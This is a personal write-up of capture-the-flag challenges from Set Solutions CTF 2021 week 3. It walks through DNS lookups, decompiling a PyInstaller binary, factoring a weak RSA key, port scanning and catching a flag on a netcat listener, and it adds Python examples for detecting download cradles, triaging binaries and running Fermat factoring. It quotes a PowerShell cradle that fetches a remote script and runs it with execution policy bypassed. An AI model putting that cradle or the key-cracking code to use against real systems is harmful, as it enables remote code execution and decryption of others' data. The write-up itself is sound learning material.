Set Solutions CTF 2021 Week 3
Week 1 \ Week 2 \ Week 4
Note: Fewer challenge details were documented during week 3. The website went down shortly after the CTF ended, before I was able to thoroughly document challenge prompts and steps.
To skip to detailed writeups from week 3, start reading at Captured Communication.
Save the Lizards
Note: I forgot to record the description for this challenge; however, it contained the text
.today is a top-level domain, and a WHOIS lookup revealed that savethelizards.today was a registered domain. A DNS record lookup of savethelizards.today revealed a TXT entry containing the flag.
You Have Mail
Note: I forgot to record the description and many of the steps taken for this challenge.
You Have Mail led me to a Windows batch (.bat) script containing code to download and execute a remote PowerShell script, ftony.ps1:
PowerShell -NoProfile -NoExit -ExecutionPolicy Bypass -Command iex (New-Object Net.WebClient).DownloadString('https://ssictfstatic.s3.us-east-2.amazonaws.com/ftony.ps1')
I downloaded ftony.ps1 directly with wget and removed a significant amount of the contents, including a large try-catch block regarding a user interface. I pasted the remaining code into https://tio.run/#powershell and clicked run. The flag appeared!
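The one-liner above is a classic PowerShell download cradle: it fetches a remote script with DownloadString and hands the text straight to iex (Invoke-Expression), with -ExecutionPolicy Bypass and -NoProfile to sidestep local policy. As an added example that is not part of the original writeup, the script below scores script lines for those indicators and reports only the lines that both fetch remote content and evaluate it. The sample lines are constructed here (the host example.invalid is a placeholder, not the CTF bucket) and the indicator names are my own.

```python
import re

# Constructed script lines; the cradle is modelled on the writeup's with a placeholder host.
SAMPLE_LINES = [
    "Get-ChildItem C:\\Users | Select-Object Name",
    "PowerShell -NoProfile -NoExit -ExecutionPolicy Bypass -Command iex "
    "(New-Object Net.WebClient).DownloadString('https://example.invalid/ftony.ps1')",
    "Write-Host 'backup complete'",
    "Invoke-Expression (Invoke-WebRequest -Uri 'http://example.invalid/stage2').Content",
    "$cfg = (New-Object Net.WebClient).DownloadString('https://example.invalid/config.json')",
]

# PowerShell is case-insensitive, so every pattern is too. Names are my own labels.
INDICATORS = {
    "exec_policy_bypass": re.compile(r"-ExecutionPolicy\s+Bypass", re.I),
    "hidden_or_noprofile": re.compile(r"-(?:NoProfile|WindowStyle\s+Hidden)", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "fetch_remote": re.compile(
        r"\.DownloadString\(|\.DownloadFile\(|\bInvoke-WebRequest\b|\biwr\b", re.I
    ),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def indicators_for(line):
    """Sorted list of indicator names that match a single script line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(line))


def is_download_cradle(line):
    """A cradle both fetches remote content and hands it to an evaluator on one line.
    A bare download (for example, fetching a config file) is suspicious but not a cradle."""
    hits = indicators_for(line)
    return "fetch_remote" in hits and "invoke_expression" in hits


def find_cradles(lines):
    """Return (line index, URLs referenced, indicators) for every cradle-looking line."""
    return [
        (i, URL_RE.findall(line), indicators_for(line))
        for i, line in enumerate(lines)
        if is_download_cradle(line)
    ]


if __name__ == "__main__":
    for idx, urls, hits in find_cradles(SAMPLE_LINES):
        print(f"line {idx}: urls={urls} indicators={hits}")
```

The URLs pulled from a flagged line are what you would go on to fetch (as I did with wget) and inspect offline rather than run; the remaining indicators tell you how hard the script tries to avoid local policy.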
Knocked off Course
The Episilon satellite has been knocked off course. We can attempt some course correction maneuvers, but our odds are not good. All we’ve got to work with is a chimpanzee that flew up on a recent mission. At best, you have a 1 in 10,000 chance of getting this right.
Challenge attachments: guessNum
Knocked off Course contained a 1.8 MB Linux executable called guessNum. Before even executing guessNum, I ran strings guessNum and noticed a significant number of Python references, which implied that guessNum might be a compiled Python executable.
I extracted the contents of guessNum using pyinstxtractor.py.
Next, I used uncompyle6 to decompile guessNum.pyc, one of the files extracted by pyinstxtractor.
Alternatively, Knocked off Course could have been solved by using pwntools to script the interaction with guessNum, since the delay between each of the ~10,000 guesses would be minimal.
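The strings-then-extract triage above can be automated. As an added example (not code from the writeup or from pyinstxtractor), the script below pulls printable runs out of a binary the way strings does, keeps the ones that hint at an embedded Python runtime, and decodes the trailer cookie that PyInstaller appends to a packed executable, which is the same structure pyinstxtractor locates. The magic bytes and the cookie layout (!8sIIii64s: magic, package length, TOC offset, TOC length, Python version, libpython name) are my understanding of PyInstaller's CArchive format; the sample binary is constructed inline and is not guessNum.

```python
import re
import struct

# PyInstaller CArchive trailer cookie, as I understand the format (assumption, see lead-in):
# magic, package length, TOC offset, TOC length, Python version, libpython name.
PYINSTALLER_MAGIC = b"MEI\014\013\012\013\016"
COOKIE_FORMAT = "!8sIIii64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FORMAT)  # 88 bytes


def printable_strings(blob, min_len=4):
    """Runs of printable ASCII of at least min_len bytes, like the strings(1) tool.
    Like strings, it glues adjacent printable bytes together (a length field ending in
    an ASCII digit will prefix the string that follows it)."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def python_hints(strings):
    """Keep only strings that hint at an embedded Python runtime or PyInstaller bootloader."""
    keys = ("python", "pyi-", "_meipass", "pyinstaller")
    return [s for s in strings if any(k in s.lower() for k in keys)]


def parse_cookie(blob):
    """Locate the PyInstaller cookie and decode it; None if the magic is absent."""
    pos = blob.rfind(PYINSTALLER_MAGIC)
    if pos < 0 or pos + COOKIE_SIZE > len(blob):
        return None
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack(
        COOKIE_FORMAT, blob[pos:pos + COOKIE_SIZE]
    )
    # Newer bootloaders store major*100+minor (309 for 3.9); older ones major*10+minor (39).
    major, minor = divmod(pyver, 100) if pyver >= 100 else divmod(pyver, 10)
    return {
        "python_version": f"{major}.{minor}",
        "pylib": pylib.rstrip(b"\x00").decode("ascii"),
        "package_len": pkg_len,
        "toc_offset": toc_off,
        "toc_len": toc_len,
    }


def triage(blob):
    """Summarise whether a blob looks like a PyInstaller-packed Python program."""
    hints = python_hints(printable_strings(blob))
    cookie = parse_cookie(blob)
    return {
        "python_hints": hints,
        "cookie": cookie,
        "likely_pyinstaller": cookie is not None or bool(hints),
    }


def build_sample(pyver=309, pylib=b"libpython3.9.so.1.0"):
    """Constructed stand-in for a packed binary: ELF magic, bootloader strings, junk, cookie."""
    body = (
        b"\x7fELF" + b"\x00" * 12
        + b"pyi-runtime-tmpdir\x00_MEIPASS\x00"
        + b"\xde\xad\xbe\xef" * 8
    )
    cookie = struct.pack(COOKIE_FORMAT, PYINSTALLER_MAGIC, len(body) + COOKIE_SIZE, 16, 120, pyver, pylib)
    return body + cookie


if __name__ == "__main__":
    print(triage(build_sample()))
```

On a real file, read it with open(path, "rb").read() and pass the bytes to triage; the Python version from the cookie tells you which interpreter uncompyle6 (or a newer decompiler) needs to match.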
Captured Communication
We have a Spy! We have captured a public key, and a ciphered message. Let’s catch this spy, otherwise we're going to have to reformat the entire system and start over.
Captured Communication provided two attachments, pub_key and cipher_text. Note that neither of these files was newline terminated, should you decide to try the challenge yourself.
-----BEGIN PUBLIC KEY-----
MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQBJfoRSZIBnKN2kwQ5KHDoK
jaYFq79T4XufRQ+taIEk/HaxbPy4R1nelT9T+bWrWOylO0IzWDaPW9Hb9pQjEVdO
LxJdKpeUUZ/xAt6o2GFV0HJrZ9PQD19KvND6yTU1H2poOzmVU5OuObaq2DD5UqoO
UGUdkPfFOU1CGwcP3rhOlTeEWEcuXwZVkJXenWhFXrGjQFbpq3zUfAQ+m7OPh0Y0
Vd6jSJorwoBeA4z3lG+XLsWIdu6uLG755l30k3vtbLLK7tMU8U7li7uCfuCaOn1U
1chbesIu7TejLx7WJHu5YNneCS1L4oC2fFSyEArfUzxPgXKrGcSviqiRaU5NNY81
AgMBAAE=
-----END PUBLIC KEY-----
Using openssl, I determined that the public key was an RSA key, with the command openssl asn1parse -in pub_key.
Given that only the public key and ciphertext were provided, the next logical CTF step was to brute-force the private key using RsaCtfTool. The command python3 RsaCtfTool.py --publickey pub_key --uncipherfile cipher_text made RsaCtfTool attempt multiple types of attacks on the key. After some time, RsaCtfTool tried a Fermat attack, which succeeded, and the UTF-8 output of the decrypted ciphertext contained the flag.
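A Fermat attack succeeds when the two primes of the RSA modulus are close together: writing N = a² − b² = (a − b)(a + b) and stepping a upward from √N finds them in a handful of iterations, because the gap between a and √N is roughly (√p − √q)²/2. As an added example, not code from the writeup or from RsaCtfTool, the script below implements that search, turns the factors into a private exponent, and decodes the recovered plaintext as UTF-8 the way the tool's final output did; it also doubles as a key-acceptance check (reject any modulus that a short Fermat run splits). The toy modulus, primes 10007 and 10009, is constructed for the demonstration and is unrelated to the challenge key.

```python
from math import isqrt


def fermat_factor(n, max_steps=100_000):
    """Fermat's method: find a, b with n = a^2 - b^2 = (a - b)(a + b).
    Primes that are close together fall out almost immediately;
    distant primes exhaust the step budget and we give up (return None)."""
    if n % 2 == 0:
        return 2, n // 2
    a = isqrt(n)
    if a * a < n:            # start at ceil(sqrt(n))
        a += 1
    for _ in range(max_steps):
        b2 = a * a - n
        b = isqrt(b2)
        if b * b == b2:      # a^2 - n is a perfect square: done
            return a - b, a + b
        a += 1
    return None


def is_fermat_weak(n, budget=10_000):
    """Key-acceptance check: True when a short Fermat run already splits n."""
    factors = fermat_factor(n, budget)
    return factors is not None and 1 < factors[0] < n


def recover_private_exponent(n, e, budget=100_000):
    """d = e^-1 mod (p-1)(q-1), available as soon as n is factored."""
    factors = fermat_factor(n, budget)
    if factors is None:
        return None
    p, q = factors
    return pow(e, -1, (p - 1) * (q - 1))


def decrypt_to_text(n, e, c):
    """Mirror the tool's final step: factor, derive d, decrypt, decode as UTF-8."""
    d = recover_private_exponent(n, e)
    if d is None:
        return None
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big").decode("utf-8")


# Constructed toy key: p and q differ by 2, the easiest possible case for the attack.
P, Q = 10007, 10009
N, E = P * Q, 65537
PLAINTEXT = b"hi"
CIPHERTEXT = pow(int.from_bytes(PLAINTEXT, "big"), E, N)

if __name__ == "__main__":
    print("factors:", fermat_factor(N))
    print("weak key:", is_fermat_weak(N))
    print("decrypted:", decrypt_to_text(N, E, CIPHERTEXT))
```

With real key sizes the arithmetic is identical (Python integers are arbitrary precision); what changes is only how far apart p and q are, which is exactly what a sound key generator guarantees and what this check verifies.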
To the Stars
WeAre.ReturningTo.Space And only one way to get there…
Similar to Save the Lizards, the description of To the Stars contained text that appeared to be a URL. Given that this challenge again involved public, internet-facing infrastructure, I wanted to ensure that any actions I took were—with some confidence—against Set Solutions CTF endpoints. WHOIS and DNS queries for WeAre.ReturningTo.Space revealed that the domain was 31 days old and resolved to the IP address 188.8.131.52, which belonged to an EC2 instance in the same region as To the Stars.
After initial port scans of 184.108.40.206 revealed nothing, I ran a full SYN port scan by executing sudo nmap -p- 220.127.116.11. The full scan revealed that only a single port, 42731, was open.
A netcat connection to 18.104.22.168 42731 revealed that the EC2 instance was running OpenSSH on port 42731.
Finally, I SSH’d to 22.214.171.124 42731, and some ASCII art, along with the flag, was returned in the banner.
Poison Delivery
Space Force SIGINT has identified a way to intercept foreign communications. Waiting for your input commander, to provide an IP address to redirect the signal to…
The challenge page for Poison Delivery contained a prompt for an IP address. After trying various ways to break the input form, I realized that the challenge might take a bit more effort.
Presumably, the next steps—or the flag—would be sent to the IP address entered. This challenge is especially interesting because it is very out of the box–it requires the competitor to listen on a public IP address. In retrospect, my steps for Poison Delivery were:
- Spin up a basic, free EC2 instance with a public IP
- Allow all TCP traffic, disable the firewall and listen with tcpdump
- Determine the port that the challenge attempts to send data to
- Listen with netcat on the port discovered in step 3
Caught in the thrill of competition, I sped through each step, forgetting to document along the way. I was able to use my free AWS university account to spin up an EC2 instance, which went smoothly. I allowed TCP traffic from all IP addresses to the instance, disabled its firewall (yikes!) and listened with tcpdump. Eventually, a connection on port 38486 was logged! I set up a listener on port 38486 by executing nc -lvnp 38486.
Finally, I clicked “intercept communications” one last time, and a request came in containing the flag.
Note: you will have to take my word that the flag was contained in the request's 40-byte Content-Length body.
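Step 3 of the procedure above, working out which port the challenge connects to, comes down to reading tcpdump output for inbound SYNs to your own address and ignoring everything else (your host's RST replies, your own outbound traffic). Once that host is reachable from the whole internet, the same filter also shows you every unexpected port other people are probing. As an added example that is not part of the original writeup, the script below parses tcpdump -n style lines and counts connection attempts per destination port; the capture lines are constructed here with documentation addresses (198.51.100.7 stands in for the EC2 instance) and are not the real capture.

```python
import re
from collections import Counter

# Constructed tcpdump -n output (not the CTF capture). The listener host is 198.51.100.7.
SAMPLE_CAPTURE = """\
12:01:05.120034 IP 203.0.113.9.44120 > 198.51.100.7.38486: Flags [S], seq 1234, win 64240, length 0
12:01:05.120101 IP 198.51.100.7.38486 > 203.0.113.9.44120: Flags [R.], seq 0, ack 1235, win 0, length 0
12:01:07.331900 IP 203.0.113.9.44121 > 198.51.100.7.22: Flags [S], seq 9, win 64240, length 0
12:01:09.000000 IP 198.51.100.7.51000 > 192.0.2.10.443: Flags [S], seq 5, win 64240, length 0
12:01:12.555555 IP 203.0.113.9.44122 > 198.51.100.7.38486: Flags [S], seq 77, win 64240, length 0
"""

# tcpdump prints "src.port > dst.port: Flags [..]" for TCP; anything else is skipped.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)


def parse_line(line):
    """Return a dict with ts/src/sport/dst/dport/flags, or None for non-TCP lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    pkt = m.groupdict()
    pkt["sport"] = int(pkt["sport"])
    pkt["dport"] = int(pkt["dport"])
    return pkt


def inbound_syn_ports(capture, my_ip):
    """Count bare-SYN connection attempts per destination port on my_ip.
    RST replies from my_ip and my own outbound SYNs are excluded by the dst check."""
    counts = Counter()
    for line in capture.splitlines():
        pkt = parse_line(line)
        if pkt and pkt["dst"] == my_ip and pkt["flags"] == "S":
            counts[pkt["dport"]] += 1
    return counts


def unexpected_ports(capture, my_ip, expected=frozenset({22})):
    """Ports that received SYNs but that you did not intend to expose, most-hit first."""
    counts = inbound_syn_ports(capture, my_ip)
    return [port for port, _ in counts.most_common() if port not in expected]


if __name__ == "__main__":
    print(inbound_syn_ports(SAMPLE_CAPTURE, "198.51.100.7"))
    print("candidate ports:", unexpected_ports(SAMPLE_CAPTURE, "198.51.100.7"))
```

In practice you would feed it the output of tcpdump -n -i eth0 'tcp[tcpflags] & tcp-syn != 0' (a filter that keeps only SYN packets), and the top unexpected port is the one to open a listener on; ports that keep showing up after the challenge is over are background scanning and a reminder to put the security group back.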
Week 3 lessons learned: Do not wait a month to document a CTF competition. The infrastructure will most likely be taken down, and all you will have left is broken RsaCtfTool installs.